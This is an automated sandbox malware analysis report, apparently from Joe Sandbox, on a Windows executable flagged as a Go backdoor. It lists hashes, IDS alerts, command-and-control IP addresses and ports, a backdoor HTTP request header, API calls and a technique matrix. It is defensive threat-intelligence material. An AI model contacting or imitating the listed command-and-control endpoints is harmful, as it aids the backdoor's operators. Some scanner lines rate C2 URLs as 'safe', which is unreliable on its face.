Windows Analysis Report
m0Yc9KltGw.exe

Overview

General Information

Sample name: m0Yc9KltGw.exe (renamed because original name is a hash value)
Original sample name: 63b7bb26a60fb9e73c0e1427a4fcfaf2.exe
Analysis ID: 1550358
MD5: 63b7bb26a60fb9e73c0e1427a4fcfaf2
SHA1: 83b9ac53d958a36dd340f93d08615f452584cf17
SHA256: e78fc7300dea3f82b9fb7130621e27f5459d4a521243fd42033f6f010f2995e2
Tags: exe, user-abuse_ch

Detection

GO Backdoor
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • m0Yc9KltGw.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\m0Yc9KltGw.exe" MD5: 63B7BB26A60FB9E73C0E1427A4FCFAF2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |
Process Memory Space: m0Yc9KltGw.exe PID: 1984 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T17:18:58.773033+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49709 | TCP
2024-11-06T17:19:37.328755+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49719 | TCP
2024-11-06T17:19:22.896893+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 185.121.233.152 | 25139 | TCP
2024-11-06T17:19:52.178566+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 185.121.233.152 | 25139 | TCP
2024-11-06T17:19:52.412438+0100 | 2855538 | 1 | A Network Trojan was detected | 185.121.233.152 | 25139 | 192.168.2.8 | 49718 | TCP
2024-11-06T17:19:22.896584+0100 | 2855539 | 1 | A Network Trojan was detected | 185.121.233.152 | 25139 | 192.168.2.8 | 49718 | TCP

      AV Detection

      Source: m0Yc9KltGw.exe; ReversingLabs: Detection: 45%
      Source: Submited Sample; Integrated Neural Analysis Model: Matched 99.1% probability
      Source: m0Yc9KltGw.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: m0Yc9KltGw.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 4x nop then mov dword ptr [esp], edx (0_2_031BD130)
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 4x nop then shr ecx, 0Dh (0_2_031C84C0)
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 4x nop then shr ebp, 0Dh (0_2_031C7A50)

      Networking

      Source: Network traffic; Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:25139 -> 192.168.2.8:49718
      Source: Network traffic; Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Network traffic; Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Network traffic; Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:25139 -> 192.168.2.8:49718
      Source: global traffic; TCP traffic: 185.121.233.152 ports 25139,1,2,3,5,9
      Source: global traffic; TCP traffic: 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Joe Sandbox View; IP Address: 46.8.232.106
      Source: Joe Sandbox View; IP Address: 93.185.159.253
      Source: Joe Sandbox View; ASN Name: IPCORE-ASES
      Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49709
      Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49719
      Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown; TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
      Source: unknown; HTTP traffic detected: POST / HTTP/1.1, Host: 46.8.232.106, User-Agent: Go-http-client/1.1, Content-Length: 198, X-Api-Key: roePuyRb, Accept-Encoding: gzip
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://188.130.206.243
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C12A000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.232.106
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.236.61
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://91.212.166.91
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://93.185.159.253
      Source: m0Yc9KltGw.exe; String found in binary or memory: http://www.innosetup.com/
      Source: m0Yc9KltGw.exe; String found in binary or memory: http://www.remobjects.com/ps
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031E0060 SetWaitableTimer,NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031FC7B0 NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031D6B90 SetWaitableTimer,NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031D6E00 SetWaitableTimer,NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031D6D30 SetWaitableTimer,NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031CEC30 LoadLibraryExW,RtlAddVectoredContinueHandler,LoadLibraryExW,LoadLibraryExW,NtWaitForSingleObject,RtlGetCurrentPeb,RtlGetNtVersionNumbers,LoadLibraryExW,timeBeginPeriod,timeEndPeriod,timeBeginPeriod,LoadLibraryExW,WSAGetOverlappedResult
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_031D6C60 SetWaitableTimer,NtWaitForSingleObject
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00414073 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00415683 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00415176 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_0041511D NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00415218 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00414293 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_0041388D NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_0041593F NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_004149A2 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00414B29 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00414BC4 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00414BD3 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe; Code function: 0_2_00413CD3 NtQueryDefaultLocale
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925C520_2_02925C52
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292445D0_2_0292445D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292344A0_2_0292344A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029245830_2_02924583
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D8D0_2_02925D8D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925DB20_2_02925DB2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029265B20_2_029265B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924DB90_2_02924DB9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924DD00_2_02924DD0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923DD70_2_02923DD7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255CC0_2_029255CC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255FE0_2_029255FE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02927D1D0_2_02927D1D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923D030_2_02923D03
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D0F0_2_02925D0F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292552B0_2_0292552B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02928D570_2_02928D57
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D5B0_2_02925D5B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255590_2_02925559
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029245660_2_02924566
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029275650_2_02927565
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02927D6A0_2_02927D6A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294265F0_2_0294265F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029412900_2_02941290
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02940E800_2_02940E80
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942E100_2_02942E10
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294121A0_2_0294121A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294160A0_2_0294160A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417B20_2_029417B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417A70_2_029417A7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417AD0_2_029417AD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417F40_2_029417F4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417490_2_02941749
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029418850_2_02941885
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029408870_2_02940887
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029418C10_2_029418C1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942C5D0_2_02942C5D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942C4F0_2_02942C4F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419990_2_02941999
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029421C90_2_029421C9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419F70_2_029419F7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419140_2_02941914
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419310_2_02941931
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942D6D0_2_02942D6D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029520410_2_02952041
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029510790_2_02951079
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02952B8A0_2_02952B8A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029517360_2_02951736
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02950F3A0_2_02950F3A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029517210_2_02951721
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0295115A0_2_0295115A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02950D600_2_02950D60
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0295256A0_2_0295256A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029627E60_2_029627E6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E5900_2_0296E590
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961E910_2_02961E91
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626B10_2_029626B1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EABA0_2_0296EABA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A2D50_2_0296A2D5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961ACF0_2_02961ACF
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626FE0_2_029626FE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E6E50_2_0296E6E5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626120_2_02962612
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969E190_2_02969E19
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969E080_2_02969E08
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029612360_2_02961236
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296123B0_2_0296123B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962A5C0_2_02962A5C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EA750_2_0296EA75
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029622720_2_02962272
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296167D0_2_0296167D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296127A0_2_0296127A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961E670_2_02961E67
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029612610_2_02961261
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961F8F0_2_02961F8F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296D3B20_2_0296D3B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617BB0_2_029617BB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296B3D70_2_0296B3D7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617E30_2_029617E3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962F050_2_02962F05
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961B010_2_02961B01
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961B260_2_02961B26
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617510_2_02961751
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296274D0_2_0296274D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EB780_2_0296EB78
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296ACB60_2_0296ACB6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029620B50_2_029620B5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618D40_2_029618D4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029760D00_2_029760D0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029624CD0_2_029624CD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296DC170_2_0296DC17
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962C100_2_02962C10
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618030_2_02961803
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296203B0_2_0296203B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962C270_2_02962C27
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A02E0_2_0296A02E
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618580_2_02961858
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029620420_2_02962042
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E4710_2_0296E471
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962D950_2_02962D95
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961D820_2_02961D82
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619B60_2_029619B6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029649A10_2_029649A1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619D40_2_029619D4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029621D50_2_029621D5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969DC00_2_02969DC0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029691CF0_2_029691CF
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619CB0_2_029619CB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969DCB0_2_02969DCB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296CDF40_2_0296CDF4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962DFA0_2_02962DFA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296191D0_2_0296191D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A5220_2_0296A522
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: String function: 031D3360 appears 155 times
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: String function: 031AFC50 appears 46 times
      Source: m0Yc9KltGw.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: m0Yc9KltGw.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: m0Yc9KltGw.exe, 00000000.00000002.2733958560.000000000C0AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs m0Yc9KltGw.exe
      Source: m0Yc9KltGw.exe, 00000000.00000000.1465947188.0000000000CDF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs m0Yc9KltGw.exe
      Source: m0Yc9KltGw.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: classification engine Classification label: mal76.troj.evad.winEXE@1/1@0/6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe File created: C:\Users\user\AppData\Local\config
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: m0Yc9KltGw.exe ReversingLabs: Detection: 45%
      Source: m0Yc9KltGw.exe String found in binary or memory: -Helper process exited with failure code: 0x%x
      Source: m0Yc9KltGw.exe String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
      Source: m0Yc9KltGw.exe String found in binary or memory: /LoadInf=
      Source: m0Yc9KltGw.exe String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe File read: C:\Users\user\Desktop\m0Yc9KltGw.exe
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: k7rn7l32.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: ntd3ll.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Section loaded: mswsock.dll
      Source: m0Yc9KltGw.exe Static file information: File size 9312768 > 1048576
      Source: m0Yc9KltGw.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7d9200
      Source: m0Yc9KltGw.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: m0Yc9KltGw.exe Static PE information: real checksum: 0x1719f5 should be: 0x8efd91
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: 0_2_031FB880 rdtscp 0_2_031FB880
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: 0_2_031CF280 GetProcessAffinityMask,GetSystemInfo,0_2_031CF280
      Source: m0Yc9KltGw.exe Binary or memory string: UDYUCaVhDxVMCIEE
      Source: m0Yc9KltGw.exe, 00000000.00000002.2726670972.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
      Source: m0Yc9KltGw.exe Binary or memory string: YE[UVmCIGh
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: 0_2_031FB880 rdtscp 0_2_031FB880
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Code function: 0_2_031E51F0 RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,0_2_031E51F0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exe Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation

      Stealing of Sensitive Information

      Source: Yara match File source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: m0Yc9KltGw.exe PID: 1984, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match File source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: m0Yc9KltGw.exe PID: 1984, type: MEMORYSTR

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
      Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd
      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
      Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
      Defense Evasion: 1 Masquerading; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; 2 Obfuscated Files or Information; Software Packing
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
      Discovery: 11 Security Software Discovery; 12 System Information Discovery; Query Registry; System Network Configuration Discovery; Internet Connection Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
      Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
      Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; 1 Proxy
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

      Source | Detection | Scanner | Label | Link
      m0Yc9KltGw.exe | 46% | ReversingLabs | Win32.Trojan.Generic |
      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      http://188.130.206.243http://46.8.232.106 | 0% | Avira URL Cloud | safe |
      http://188.130.206.243 | 0% | Avira URL Cloud | safe |
      http://188.130.206.243/ | 0% | Avira URL Cloud | safe |

      No contacted domains info

      Name | Malicious | Antivirus Detection | Reputation
      http://46.8.232.106/ | false | | high
      http://46.8.236.61/ | false | | high
      http://93.185.159.253/ | false | | high
      http://188.130.206.243/ | false | Avira URL Cloud: safe | unknown
      http://91.212.166.91/ | false | | high

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.innosetup.com/ | m0Yc9KltGw.exe | false | | high
      http://46.8.232.106 | m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | | high
      http://188.130.206.243http://46.8.232.106 | m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C12A000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://188.130.206.243 | m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://93.185.159.253 | m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | | high
